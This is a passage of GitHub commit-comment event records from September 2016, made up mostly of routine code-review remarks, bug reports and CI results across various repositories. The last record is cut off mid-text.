{"id":"4508288612","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18879664,"position":null,"line":null,"path":null,"commit_id":"6947b52411930985374d92bad59f72814be7f566","created_at":"2016-09-02T12:42:28Z","updated_at":"2016-09-02T12:42:28Z","body":"Подскажите, смена языка как теперь происходить? раньше можно было добавить язык в сессию user.\r\nЕсть ли какая то функция, которая принимает язык, устанавливает и перенаправляет назад с префиксом в url?"}},"created_at":"2016-09-02T12:42:28Z"}
{"id":"4508292423","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879671,"position":52,"line":52,"path":"src/com/Controller.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:43:19Z","updated_at":"2016-09-02T12:43:19Z","body":"You can keep repository as object member and use it in your all controller methods.\r\nMove this row \r\nUserRepository repository = new UserRepository();\r\nto your class\r\n\r\npublic class Controller {\r\nUserRepository repository = new UserRepository();\r\n...\r\n}"}},"created_at":"2016-09-02T12:43:19Z"}
{"id":"4508293333","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"w3c/i18n-checker"},"payload":{"comment":{"id":18879672,"position":null,"line":null,"path":null,"commit_id":"6ba79ef40b545e3391fb6ac7d1aa970ef4cbf424","created_at":"2016-09-02T12:43:33Z","updated_at":"2016-09-02T12:43:33Z","body":"@tripu i thought we agreed yesterday when talking with Ted (and on previous occasions) that only substantive code changes need to go through the PR route - editorial or message related changes can be committed direct to master. I considered it unlikely that this editorial change to the readme file would need to be held up until a formal review gate was passed.\r\n\r\n"}},"created_at":"2016-09-02T12:43:33Z"}
{"id":"4508296683","type":"CommitCommentEvent","actor":{"login":"rimzici"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18879676,"position":null,"line":null,"path":null,"commit_id":"f4dbf37ba85acb988bbb26e339ea7f7536b1f931","created_at":"2016-09-02T12:44:11Z","updated_at":"2016-09-02T12:44:11Z","body":"Similar Issue: Using RN 0.31\r\n\r\nPushNotificationIOS.requestPermissions().then(permission => { });\r\n\r\nworking for the first time.\r\nexplaining the scenario and issue facing, \r\n1. When user clicks \"allow\" for the request my \r\nPushNotificationIOS.addEventListener('register', (token) => { });\r\n\r\nlistener gets called and i am able to receive token, \r\n\r\n2. But if the user clicks \"Dont Allow\" in the promise iam receive the permission object with correct values as {alert:0,badge:0,sound:0}\r\nBut this time my register event never gets fired , so no token.\r\n incase if the user turns on notification in the settings I would like to receive token again.\r\nfor that i tried \r\nPushNotificationIOS.requestPermissions().then(permission => { });\r\nbut its never getting called and not able to generate token again.\r\n\r\nso finally it seems \r\nPushNotificationIOS.requestPermissions().then(permission => { });\r\nworks only for the first time, second time its not opening the request popup.\r\nThanks in Advance"}},"created_at":"2016-09-02T12:44:11Z"}
{"id":"4508299057","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879680,"position":1,"line":1,"path":".classpath","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:44:43Z","updated_at":"2016-09-02T12:44:43Z","body":"This kind of files must be added to the gitignore (otherwise you could be overriding the configuration of my workspace)"}},"created_at":"2016-09-02T12:44:43Z"}
{"id":"4508299365","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18879681,"position":null,"line":null,"path":null,"commit_id":"6947b52411930985374d92bad59f72814be7f566","created_at":"2016-09-02T12:44:47Z","updated_at":"2016-09-02T12:44:47Z","body":"просто в урл первым префиксом добавляете язык и все"}},"created_at":"2016-09-02T12:44:47Z"}
{"id":"4508300189","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879682,"position":1,"line":1,"path":".project","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:44:55Z","updated_at":"2016-09-02T12:44:55Z","body":"This kind of files must be added to the gitignore"}},"created_at":"2016-09-02T12:44:55Z"}
{"id":"4508301104","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879685,"position":1,"line":1,"path":".settings/.jsdtscope","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:45:10Z","updated_at":"2016-09-02T12:45:10Z","body":"This kind of folder must be added to the gitignore"}},"created_at":"2016-09-02T12:45:10Z"}
{"id":"4508305388","type":"CommitCommentEvent","actor":{"login":"NeverSinkGaming"},"repo":{"name":"NeverSinkGaming/NeverSink-Filter"},"payload":{"comment":{"id":18879695,"position":null,"line":null,"path":null,"commit_id":"5adf49b53dc99025c4172e8455cd1cada04699d2","created_at":"2016-09-02T12:46:06Z","updated_at":"2016-09-02T12:46:06Z","body":"Yes"}},"created_at":"2016-09-02T12:46:06Z"}
{"id":"4508305640","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18879696,"position":5,"line":38,"path":"app/components/home/UserHome/body/AddDocument/AddDocumentForm.jsx","commit_id":"9714b0dc4adfb47b711d28d14862d947b544f3e3","created_at":"2016-09-02T12:46:10Z","updated_at":"2016-09-02T12:46:10Z","body":"The solution I went with is using `toLowerCase()` in the front end and\nignoring the case when doing db queries using regular expressions\n\nhttps://github.com/andela-kndungu/document-ms-frontend/commit/f4688b0286c23b78654132391700fa008689ca6e\nhttps://github.com/andela-kndungu/document-ms-frontend/commit/b54a12eaa8e47bf9efa2153c3b6cd248d91134f7\n\nOn Thu, Sep 1, 2016 at 9:46 PM, kesienaAkp <notifications@github.com> wrote:\n\n> So you can have a hybrid solution of both, insertion queries use lower\n> case tags and the autocomplete display is also capitalized with css 😄\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andela-kndungu/document-ms-frontend/commit/9714b0dc4adfb47b711d28d14862d947b544f3e3#commitcomment-18868683>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQfoExmAcU0EWI6P8VIfO-poWxcgcvD-ks5qlx1ogaJpZM4Jy6Nk>\n> .\n>\n\n\n\n-- \n*Kinuthia Ndung'u /** Andela.com\n<http://andela.com/?utm_source=andela&utm_medium=email&utm_campaign=signature> *\n*Software Developer / +254722826987 <646.620.0604> / @Andela\n<http://bit.ly/andelatwitter>*\nWe're hiring! Check out our careers page. <http://bit.ly/andelacareers>\n"}},"created_at":"2016-09-02T12:46:10Z"}
{"id":"4508307440","type":"CommitCommentEvent","actor":{"login":"ax3l"},"repo":{"name":"citibeth/spack"},"payload":{"comment":{"id":18879702,"position":87,"line":1054,"path":"lib/spack/docs/spack_workflows.rst","commit_id":"1c66c2e29cd2ef1133b92907530744e04f216d20","created_at":"2016-09-02T12:46:29Z","updated_at":"2016-09-02T12:46:29Z","body":"I think shipping a patch or a set of patches is lightweight and less intrusive than adding additional sources. We should maybe prefer that before starting to fork & forget."}},"created_at":"2016-09-02T12:46:29Z"}
{"id":"4508308395","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879704,"position":37,"line":37,"path":"WebContent/crearUsuario.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:46:40Z","updated_at":"2016-09-02T12:46:40Z","body":"The label should be linked to the input (http://www.alsacreations.com/astuce/lire/6-utiliser-element-label-input-formulaires.html)"}},"created_at":"2016-09-02T12:46:40Z"}
{"id":"4508310227","type":"CommitCommentEvent","actor":{"login":"maxcool73"},"repo":{"name":"maxcool73/exchange"},"payload":{"comment":{"id":18879710,"position":null,"line":null,"path":null,"commit_id":"315375ec355df20ee3126484bb656bf7f9106726","created_at":"2016-09-02T12:47:05Z","updated_at":"2016-09-02T12:47:05Z","body":"fix"}},"created_at":"2016-09-02T12:47:05Z"}
{"id":"4508311041","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879712,"position":35,"line":35,"path":"WebContent/engadir.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:47:16Z","updated_at":"2016-09-02T12:47:16Z","body":"Same here"}},"created_at":"2016-09-02T12:47:16Z"}
{"id":"4508311366","type":"CommitCommentEvent","actor":{"login":"anashashmi"},"repo":{"name":"anashashmi/idiorm"},"payload":{"comment":{"id":18879713,"position":null,"line":null,"path":null,"commit_id":"96e2bdb17e2bca373a7b1814037ca19c5a93d5ab","created_at":"2016-09-02T12:47:21Z","updated_at":"2016-09-02T12:47:21Z","body":"\n\nThanks for letting me know.\n\n\nUnfortunately, I didn't know someone was actually maintaining this with new features so I created my own.  When I tried to add to packagist, I found couple of other versions. One stood out in particular. Idiorm and Paris by voku. I closed mine, and went with that.  He did a terrible initial fork by changing the file name and tabs/spaces. So it is difficult to compare, however, he seems to be maintaining it well.\n\n\nAnas Hashmi\n\n\n\n\n\n\nOn Mon, Aug 29, 2016 at 8:25 AM -0400, \"Lars Moelleken\" <notifications@github.com> wrote:\n\n\n\n\n\nHi,\n\nI have already added a fork with namespace-support (PSR-4), maybe you will contribute?\n\n-> https://github.com/voku/idiorm/tree/master/src/idiorm/orm\n\n--\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly or view it on GitHub:\nhttps://github.com/anashashmi/idiorm/commit/96e2bdb17e2bca373a7b1814037ca19c5a93d5ab#commitcomment-18811088\n"}},"created_at":"2016-09-02T12:47:21Z"}
{"id":"4508312403","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879716,"position":42,"line":42,"path":"WebContent/engadirProducto.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:47:35Z","updated_at":"2016-09-02T12:47:35Z","body":"Same here"}},"created_at":"2016-09-02T12:47:35Z"}
{"id":"4508312483","type":"CommitCommentEvent","actor":{"login":"maxcool73"},"repo":{"name":"maxcool73/exchange"},"payload":{"comment":{"id":18879717,"position":4,"line":3,"path":"README.md","commit_id":"315375ec355df20ee3126484bb656bf7f9106726","created_at":"2016-09-02T12:47:36Z","updated_at":"2016-09-02T12:47:36Z","body":"fix"}},"created_at":"2016-09-02T12:47:36Z"}
{"id":"4508314101","type":"CommitCommentEvent","actor":{"login":"ax3l"},"repo":{"name":"citibeth/spack"},"payload":{"comment":{"id":18879720,"position":104,"line":1071,"path":"lib/spack/docs/spack_workflows.rst","commit_id":"1c66c2e29cd2ef1133b92907530744e04f216d20","created_at":"2016-09-02T12:47:58Z","updated_at":"2016-09-02T12:47:58Z","body":"would be cool if the `patch()` command could simply accept a link, too.\r\n\r\ne.g., `patch(url='https://github.com/jswhit/pyproj/pull/54.patch', when=...)`"}},"created_at":"2016-09-02T12:47:58Z"}
{"id":"4508315504","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879723,"position":40,"line":40,"path":"WebContent/engadirUsuario.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:48:16Z","updated_at":"2016-09-02T12:48:16Z","body":"Same here"}},"created_at":"2016-09-02T12:48:16Z"}
{"id":"4508315514","type":"CommitCommentEvent","actor":{"login":"fasterrr"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879724,"position":4,"line":4,"path":"local/templates/.default/components/bitrix/catalog/main_catalog/bitrix/catalog.section/.default/component_epilog.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:48:16Z","updated_at":"2016-09-02T12:48:16Z","body":"отладочный код нужно удалять"}},"created_at":"2016-09-02T12:48:16Z"}
{"id":"4508317773","type":"CommitCommentEvent","actor":{"login":"fasterrr"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879732,"position":3,"line":3,"path":"local/templates/.default/components/bitrix/catalog/main_catalog/bitrix/catalog.section/.default/component_epilog.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:48:46Z","updated_at":"2016-09-02T12:48:46Z","body":"добавь небольшой комментарий - для чего этот скрипт"}},"created_at":"2016-09-02T12:48:46Z"}
{"id":"4508319000","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"Catzenjaeger/FigureLib_4"},"payload":{"comment":{"id":18879736,"position":null,"line":null,"path":null,"commit_id":"190fbd139518ca25a00da65c70a45cf33e1c9cd6","created_at":"2016-09-02T12:49:04Z","updated_at":"2016-09-02T12:49:04Z","body":"this is the site where my page nav dosent work: https://github.com/Catzenjaeger/FigureLib_4/blob/master/infusions/figurelib/templates/template_render_figure.php"}},"created_at":"2016-09-02T12:49:04Z"}
{"id":"4508319996","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879739,"position":38,"line":38,"path":"WebContent/crearUsuario.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:49:18Z","updated_at":"2016-09-02T12:49:18Z","body":"<input type=\"email\" name=\"user_email\">\r\nThis way you have email format validation"}},"created_at":"2016-09-02T12:49:18Z"}
{"id":"4508321561","type":"CommitCommentEvent","actor":{"login":"ymarcon"},"repo":{"name":"obiba/mica2"},"payload":{"comment":{"id":18879744,"position":null,"line":null,"path":null,"commit_id":"cdeec684c7bddb4cdf647eb8825a242a1117f0fc","created_at":"2016-09-02T12:49:39Z","updated_at":"2016-09-02T12:49:39Z","body":"Bug: try in an anonymous window: momentjs writes the dates in korean..."}},"created_at":"2016-09-02T12:49:39Z"}
{"id":"4508325579","type":"CommitCommentEvent","actor":{"login":"Vasar007"},"repo":{"name":"valera5505/SPbU"},"payload":{"comment":{"id":18879750,"position":null,"line":null,"path":null,"commit_id":"193cb630647fa5cc4bbd6c58ed5ae58ee93e2ce6","created_at":"2016-09-02T12:50:33Z","updated_at":"2016-09-02T12:50:33Z","body":"Hello, world!"}},"created_at":"2016-09-02T12:50:33Z"}
{"id":"4508325588","type":"CommitCommentEvent","actor":{"login":"nkast"},"repo":{"name":"MonoGame/MonoGame"},"payload":{"comment":{"id":18879749,"position":9,"line":219,"path":"MonoGame.Framework/Graphics/GraphicsDevice.cs","commit_id":"a21833aec8da29a7aab3dafc42d9de685a131834","created_at":"2016-09-02T12:50:33Z","updated_at":"2016-09-02T12:50:33Z","body":"WindowsUniversal project fails with error\r\nCS0246\tThe type or namespace name 'ApplicationException' could not be found (are you missing a using directive or an assembly reference?)\tMonoGame.Framework.WindowsUniversal\tP:\\MonoGame\\MonoGame.Framework\\Graphics\\GraphicsDevice.cs\t 219\r\n\r\nApparently ApplicationException is not available for store apps.\r\n"}},"created_at":"2016-09-02T12:50:33Z"}
{"id":"4508326182","type":"CommitCommentEvent","actor":{"login":"neoeinstein"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18879753,"position":19,"line":46,"path":"src/Logary/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T12:50:41Z","updated_at":"2016-09-02T12:50:41Z","body":"One thing to note here is that you probably also want to remove the job from delayed too. Otherwise you can end up with the delayed job restarting and re-registering itself after a call to unregister. Maybe that's intended behavior, but I closed that hole in my implementation."}},"created_at":"2016-09-02T12:50:41Z"}
{"id":"4508326722","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879754,"position":null,"line":null,"path":null,"commit_id":"ba73f208fcf7b3a7ae60277428b7395d041e15b9","created_at":"2016-09-02T12:50:49Z","updated_at":"2016-09-02T12:50:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 906](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12389&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:10:07"}},"created_at":"2016-09-02T12:50:49Z"}
{"id":"4508328133","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879757,"position":19,"line":1868,"path":"css/style_redesign.css","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:51:10Z","updated_at":"2016-09-02T12:51:10Z","body":"Прикольное название"}},"created_at":"2016-09-02T12:51:10Z"}
{"id":"4508328748","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879760,"position":63,"line":63,"path":"WebContent/engadirProducto.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:51:18Z","updated_at":"2016-09-02T12:51:18Z","body":"`<input type=\"date\" name=\"pro_fecRepos\">`\r\nSame for the dates"}},"created_at":"2016-09-02T12:51:18Z"}
{"id":"4508329208","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879761,"position":19,"line":1868,"path":"css/style_redesign.css","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:51:24Z","updated_at":"2016-09-02T12:51:24Z","body":"Почти margin_5px"}},"created_at":"2016-09-02T12:51:24Z"}
{"id":"4508330125","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879767,"position":52,"line":1901,"path":"css/style_redesign.css","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:51:37Z","updated_at":"2016-09-02T12:51:37Z","body":"Удалить"}},"created_at":"2016-09-02T12:51:37Z"}
{"id":"4508330682","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879769,"position":64,"line":1913,"path":"css/style_redesign.css","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:51:44Z","updated_at":"2016-09-02T12:51:44Z","body":"удалить"}},"created_at":"2016-09-02T12:51:44Z"}
{"id":"4508330974","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879771,"position":66,"line":66,"path":"WebContent/engadirProducto.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:51:48Z","updated_at":"2016-09-02T12:51:48Z","body":"Maybe a select tag to choose the adequate state"}},"created_at":"2016-09-02T12:51:48Z"}
{"id":"4508331412","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18879775,"position":null,"line":null,"path":null,"commit_id":"d4395cea5bb17bbe55e0c928b74b0ced1fc8d02d","created_at":"2016-09-02T12:51:55Z","updated_at":"2016-09-02T12:51:55Z","body":"@cnlohr : Can you test this? Two pairs of eyes see more than one."}},"created_at":"2016-09-02T12:51:55Z"}
{"id":"4508331502","type":"CommitCommentEvent","actor":{"login":"nowayride"},"repo":{"name":"nowayride/lade"},"payload":{"comment":{"id":18879776,"position":null,"line":null,"path":null,"commit_id":"536692c113063142b7b9f05ae9fe1bc4d4fb3635","created_at":"2016-09-02T12:51:56Z","updated_at":"2016-09-02T12:51:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;izBK18O3&#x2F;3-webhook-compatibility\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Webhook compatibility</a>"}},"created_at":"2016-09-02T12:51:56Z"}
{"id":"4508333653","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18879779,"position":1,"line":1,"path":"PhoneAddress.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-02T12:52:25Z","updated_at":"2016-09-02T12:52:25Z","body":"package names shouldn't contain underlines\r\npackage my_project; -> package am.aca.addressbood;\r\n\r\n"}},"created_at":"2016-09-02T12:52:25Z"}
{"id":"4508334333","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879782,"position":4,"line":24,"path":"local/php_interface/init.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:52:35Z","updated_at":"2016-09-02T12:52:35Z","body":"правила расстановки скобок у if"}},"created_at":"2016-09-02T12:52:35Z"}
{"id":"4508335457","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879784,"position":46,"line":46,"path":"WebContent/identificacion.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:52:50Z","updated_at":"2016-09-02T12:52:50Z","body":"Why a paragraph and not a label as before?"}},"created_at":"2016-09-02T12:52:50Z"}
{"id":"4508337060","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879787,"position":39,"line":39,"path":"WebContent/index.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:53:12Z","updated_at":"2016-09-02T12:53:12Z","body":"Avoid inline CSS"}},"created_at":"2016-09-02T12:53:12Z"}
{"id":"4508337138","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879788,"position":5,"line":5,"path":"local/templates/.default/components/bitrix/catalog/main_catalog/bitrix/catalog.section/.default/component_epilog.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:53:13Z","updated_at":"2016-09-02T12:53:13Z","body":"пробел перед {"}},"created_at":"2016-09-02T12:53:13Z"}
{"id":"4508340946","type":"CommitCommentEvent","actor":{"login":"elemoine"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18879793,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-02T12:54:01Z","updated_at":"2016-09-02T12:54:01Z","body":"I get this currently:\r\n\r\n```\r\nAuthorization Failed\r\nThis group is on a private domain.\r\nPlease sign in with an authorized account to view this content.\r\n```"}},"created_at":"2016-09-02T12:54:01Z"}
{"id":"4508342416","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879796,"position":10,"line":65,"path":"local/templates/.default/components/bitrix/catalog/main_catalog/bitrix/catalog.section/.default/template.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:54:21Z","updated_at":"2016-09-02T12:54:21Z","body":"В LANG"}},"created_at":"2016-09-02T12:54:21Z"}
{"id":"4508342843","type":"CommitCommentEvent","actor":{"login":"Mike-webGK"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18879798,"position":11,"line":66,"path":"local/templates/.default/components/bitrix/catalog/main_catalog/bitrix/catalog.section/.default/template.php","commit_id":"c5ffc40c0f7c3741a71d3ad43e291445152e9a93","created_at":"2016-09-02T12:54:26Z","updated_at":"2016-09-02T12:54:26Z","body":"В LANG"}},"created_at":"2016-09-02T12:54:26Z"}
{"id":"4508344858","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879801,"position":1,"line":1,"path":"build/classes/hibernate.cfg.xml","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:54:53Z","updated_at":"2016-09-02T12:54:53Z","body":"(This comment is not for this file)\r\nAvoid adding the .class files.\r\nAdd a rule to the gitignore"}},"created_at":"2016-09-02T12:54:53Z"}
{"id":"4508345126","type":"CommitCommentEvent","actor":{"login":"RizalG"},"repo":{"name":"RizalG/Finggerpirnt"},"payload":{"comment":{"id":18879802,"position":null,"line":null,"path":null,"commit_id":"89d856728dea039beed37384c58a74f7690e87cf","created_at":"2016-09-02T12:54:57Z","updated_at":"2016-09-02T12:54:57Z","body":"test"}},"created_at":"2016-09-02T12:54:57Z"}
{"id":"4508345411","type":"CommitCommentEvent","actor":{"login":"nosijf982"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18879803,"position":null,"line":null,"path":null,"commit_id":"e1f948d49f03df0cca60103529dd963fecf6c86c","created_at":"2016-09-02T12:55:00Z","updated_at":"2016-09-02T12:55:00Z","body":"Lo siento,es que me preocupe por corregir y no me fije en como estaba en inglés, quieres que lo cambie?"}},"created_at":"2016-09-02T12:55:00Z"}
{"id":"4508347089","type":"CommitCommentEvent","actor":{"login":"mavnn"},"repo":{"name":"logary/logary"},"payload":{"comment":{"id":18879807,"position":19,"line":46,"path":"src/Logary/Supervisor.fs","commit_id":"fc2ca126e2d2378eec4b1e19e26f260549a06110","created_at":"2016-09-02T12:55:22Z","updated_at":"2016-09-02T12:55:22Z","body":"Thanks; I spotted that last night and then forgot about it this morning..."}},"created_at":"2016-09-02T12:55:22Z"}
{"id":"4508353884","type":"CommitCommentEvent","actor":{"login":"RX14"},"repo":{"name":"BlaXpirit/crystal"},"payload":{"comment":{"id":18879824,"position":null,"line":null,"path":null,"commit_id":"27c0530c17455a04422b3711c3de87c422571792","created_at":"2016-09-02T12:56:49Z","updated_at":"2016-09-02T12:56:49Z","body":"I'm not 100% on this one, I think `it do` looks a bit weird, but maybe it's best to remove `assert` and force a message on all `it` clauses."}},"created_at":"2016-09-02T12:56:49Z"}
{"id":"4508355883","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879829,"position":1,"line":1,"path":"WebContent/crearUsuario.jsp","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:57:16Z","updated_at":"2016-09-02T12:57:16Z","body":"You should use some hierarchy.\r\nCreate a template/format/structure/... JSP with the common elements (css, title...) and two or three variables (header, menu and body) as dynamic JSPs.\r\nThis way you avoid duplicated code into each JSP"}},"created_at":"2016-09-02T12:57:16Z"}
{"id":"4508357460","type":"CommitCommentEvent","actor":{"login":"KnightHawk3"},"repo":{"name":"KnightHawk3/packr"},"payload":{"comment":{"id":18879831,"position":null,"line":null,"path":null,"commit_id":"da395a4bebebbe944cceaca4ec91c749ec3dff0a","created_at":"2016-09-02T12:57:37Z","updated_at":"2016-09-02T12:57:37Z","body":"ok now im confused fuck github"}},"created_at":"2016-09-02T12:57:37Z"}
{"id":"4508357558","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18879832,"position":null,"line":null,"path":null,"commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-02T12:57:39Z","updated_at":"2016-09-02T12:57:39Z","body":"Is the \"72\" to be use as a replacement of the hardcoded 120?"}},"created_at":"2016-09-02T12:57:39Z"}
{"id":"4508358560","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879839,"position":19,"line":19,"path":"src/com/sopra/tienda/dominio/Categoria.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:57:52Z","updated_at":"2016-09-02T12:57:52Z","body":"Miguel Garcia?"}},"created_at":"2016-09-02T12:57:52Z"}
{"id":"4508361718","type":"CommitCommentEvent","actor":{"login":"serlesen"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":18879847,"position":30,"line":30,"path":"src/com/sopra/tienda/dominio/Categoria.java","commit_id":"ca395d58a4485f2a4c0756148b0064f6d7be982e","created_at":"2016-09-02T12:58:30Z","updated_at":"2016-09-02T12:58:30Z","body":"If you want to add some information to each field, use javadoc and not simple comments"}},"created_at":"2016-09-02T12:58:30Z"}
{"id":"4508361902","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18879849,"position":null,"line":null,"path":null,"commit_id":"722411644b05c9628c8c6c62c5730d5334a09232","created_at":"2016-09-02T12:58:32Z","updated_at":"2016-09-02T12:58:32Z","body":"Solved.\n\nhttps://github.com/andela-kndungu/document-ms-frontend/commit/f2758ffb6185213c4f8204a92ab055f9925bfab2\nhttps://github.com/andela-kndungu/document-ms-frontend/commit/e5509e22c7dc4c3aff7b85e4c7367963fc1d3285\n\nOn Thu, Sep 1, 2016 at 10:20 PM, kesienaAkp <notifications@github.com>\nwrote:\n\n> 👓\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andela-kndungu/document-ms-frontend/commit/722411644b05c9628c8c6c62c5730d5334a09232#commitcomment-18869195>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQfoE6_hTox-1G6ar8ZSTjPrJdzZSsLIks5qlyWBgaJpZM4Jy52t>\n> .\n>\n\n\n\n-- \n*Kinuthia 